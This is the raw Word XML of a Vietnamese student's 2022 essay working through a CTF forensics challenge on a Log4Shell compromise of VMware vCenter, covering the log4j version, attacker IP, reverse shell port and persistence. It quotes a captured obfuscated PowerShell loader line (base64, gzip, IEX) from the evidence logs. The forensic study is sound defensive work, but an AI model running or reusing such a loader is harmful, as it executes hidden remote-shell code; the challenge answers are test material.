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BE717" w14:textId="0F453C1C" w:rsidR="009562C0" w:rsidRPr="006C5EDE" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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5EDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>BỘ THÔNG TIN VÀ TRUYỀN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465D38B1" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="006C5EDE" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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5ED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0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1640EEC6" wp14:editId="5414E79D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2074545</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>339725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1607820" cy="192468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92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EDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154C841" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="004F0723" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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C9312F2" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="004F0723" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">TIỂU LUẬN CUỐI KÌ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AA3A3" w14:textId="24A3BCDC" w:rsidR="009562C0" w:rsidRPr="004F0723" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0723">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">CHUYÊN ĐỀ AN </w:t>
      </w:r>
      <w:r w:rsidR="0064278E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">TOÀN PHẦN MỀM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47745B66" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="006C5EDE" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E33C92" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="004F0723" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0723">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Đề</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0723">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0723">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09978D67" w14:textId="6CF0EB1C" w:rsidR="009562C0" w:rsidRPr="004F0723" w:rsidRDefault="0064278E" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:firstLine="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>CTF FORENSICS DETECTLOG4J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16184C29" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:ind w:firstLine="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D2E8D06" w14:textId="67ECC400" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Người hướng dẫn</w:t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  <w:t xml:space="preserve">: TS. </w:t>
      </w:r>
      <w:r w:rsidR="00E603C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Huỳnh Trọng Thưa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE4E7A3" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện</w:t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  <w:t>: Nguyễn Tuấn Kiệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1197247F" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mã số sinh viên</w:t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  <w:t>: N18DCAT035</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5FCC2A" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lớp</w:t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  <w:t>: D18CQAT01-N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2851A7" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Khóa</w:t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  <w:t>: 2018 – 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1712C" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="00906CDC" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312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06CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hệ</w:t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</w:r>
      <w:r w:rsidRPr="00906CDC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>: ĐẠI HỌC CHÍNH QUY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF886A" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="006B755E" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125125C6" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="006B755E" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:spacing w:after="0" w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762D6D30" w14:textId="77777777" w:rsidR="009562C0" w:rsidRPr="005212A2" w:rsidRDefault="009562C0" w:rsidP="009562C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B755E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TP.HCM, tháng 11 năm 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAAEC66" w14:textId="47C2C65E" w:rsidR="009562C0" w:rsidRDefault="009562C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45A096A1" w14:textId="4F506E79" w:rsidR="00C7247D" w:rsidRPr="00171335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lastRenderedPageBreak/>
        <w:t>1.What is the version of the log4j library used by the installed VMware product?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF7315" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://communities.vmware.com/t5/VMware-vCenter-Discussions/vCenter-6-7-for-Windows-Build-19300125-Log4j/td-p/2910559</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17AEC93E" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276B167B" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335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t xml:space="preserve">2.What is the log4j library log level specified in the configuration file? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A470C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Google: log4j2 level file configuration vmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06947373" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://kb.vmware.com/s/article/2149228</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="081DBF53" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/vRealize-Operations-Manager/8.1/com.vmware.vcom.config.doc/GUID-CE444BCB-6236-4778-8DB1-3796F3D71D7C.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78417DA2" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037DAFAF" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335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t>3.The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C97B8F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 xml:space="preserve">Search log4shell.huntress.com check thời gian </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795CC27" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335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t>4.When was the first successful login to vsphere WebClient?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C5DEA5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Google: vSphere Single-Sign On process writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FB17B0" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.security.doc/GUID-FBECACED-E9E2-4DE5-A4D2-3587D90D2420.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40C89A2C" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACF5EA7" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335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t xml:space="preserve">5.What is the attacker’s IP address? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F1040" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
      <w:r w:rsidRPr="00171335"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  <w:t xml:space="preserve">Trong tệp Aud_events.log, tất cả các mục nhập log4shell.huntress.com được liên kết với cùng một địa chỉ IP: 192.168.112.128 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF2A2A" w14:textId="74B32047" w:rsidR="00C7247D" w:rsidRDefault="005E2E44" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
      <w:r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  <w:t>Search 192.168.112.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C776B19" w14:textId="77777777" w:rsidR="005E2E44" w:rsidRPr="00171335" w:rsidRDefault="005E2E44" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="3991489A" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/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</w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:rFonts w:ascii="Noto Sans" w:hAnsi="Noto Sans" w:cs="Noto Sans"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vmware syslog collector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B1064" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://docs.vmware.com/en/VMware-vSphere/6.0/com.vmware.vsphere.vcenterhost.doc/GUID-61E7E2EA-F531-4665-9225-58BA899F55A5.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78D09B00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noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A2390D" wp14:editId="1E738430">
            <wp:extent cx="5943600" cy="6972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448F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 xml:space="preserve"> Một yêu cầu http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6E2200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Khác so với log localhost thông thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421B442C" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B133496" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD527D9" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335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lastRenderedPageBreak/>
        <w:t>6.What is the port the attacker used to receive the cobalt strike reverse shell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E668300" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hint:</w:t>
      </w:r>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Check Microsoft-Windows-PowerShell%4Operational.evtx. Look for encoded base64 commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC88AB" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ScriptBlock: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D3D0BB" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFB49C9" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Base64 và Gzip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A722B" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giải mã đoạn script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460AC6C5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Vẫn chưa thấy port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267843AB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Có 1 đoạn base64 giải mã tiếp xem có port hay k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8B143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Chỉ thấy ip hacker như vẫn chưa thấy port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244555BF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 xml:space="preserve">Có 2 giải pháp lưu file virus .ps1 rồi chạy xem port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7445A" w14:textId="77777777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 xml:space="preserve"> Trên sandbox port 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4641D386" w14:textId="7B57AE96" w:rsidR="00C7247D" w:rsidRPr="00171335" w:rsidRDefault="00C7247D" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trên máy ảo + fakenet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B64DB07" w14:textId="37D56FD3" w:rsidR="00C7247D" w:rsidRPr="0043207A" w:rsidRDefault="00C7247D" w:rsidP="00C7247D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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171335">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7. What is the executable used by the attacker to gain persistence?? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3733431B" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRDefault="005F6E32" w:rsidP="00C7247D">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="161C2D"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00C7247D" w:rsidRPr="00171335">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://www.cynet.com/attack-techniques-hands-on/the-art-of-persistence/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="370159D7" w14:textId="77777777" w:rsidR="00C7247D" w:rsidRDefault="00C7247D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 w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77910C3A" w14:textId="4758ADF1" w:rsidR="006A0503" w:rsidRDefault="00AC46BA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#1 What is the computer hostname?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BCD5A9" w14:textId="77722CB0" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA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B1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269FCE14" w14:textId="72294C2D" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75AA6984" wp14:editId="259ED867">
            <wp:extent cx="360997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5E72" w14:textId="05410635" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA"/>
    <w:p w14:paraId="2A97C40C" w14:textId="73226E3B" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA">
      <w:r>
        <w:t>B2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEBC6D2" w14:textId="544E0FB9" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A13B822" wp14:editId="43955E43">
            <wp:extent cx="5943600" cy="945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6A8A" w14:textId="1FB9EFCF" w:rsidR="00AC46BA" w:rsidRDefault="00AC46BA" w:rsidP="00AC46BA">
      <w:r>
        <w:t>B3:</w:t>
